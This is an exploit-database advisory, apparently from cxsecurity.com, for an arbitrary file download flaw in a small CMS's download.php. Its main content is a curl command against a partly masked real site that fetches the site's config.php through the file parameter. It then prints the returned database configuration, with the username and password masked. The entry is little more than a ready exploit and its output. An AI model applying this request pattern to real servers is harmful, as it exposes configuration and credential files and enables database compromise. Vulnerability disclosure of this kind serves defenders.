cdrpsb cms Arbitrary File Download

2020.12.11
us Nano (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Vendor: cdrpsb.org Credits: Nano Exploit: /download.php/?file=[File] Examples: root@cuntlord:~# curl http://******.org/download.php?file=//includes/config.php <?php define("DB_SERVER", "localhost"); //The name of the mysql server, usually localhost define("DB_USER", "******); //The mysql database username define("DB_PASS", "******"); //The password for the mysql database define("DB_NAME", "cdrpsbor_cdrp"); //The name of the mysql database //There is no need to edit below here define("TBL_DL", "downloads"); /* mysql_connect(DB_SERVER, DB_USER, DB_PASS) or die(mysql_error()); mysql_select_db(DB_NAME) or die(mysql_error()); */ $mysqli = new mysqli(DB_SERVER, DB_USER, DB_PASS, DB_NAME); ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top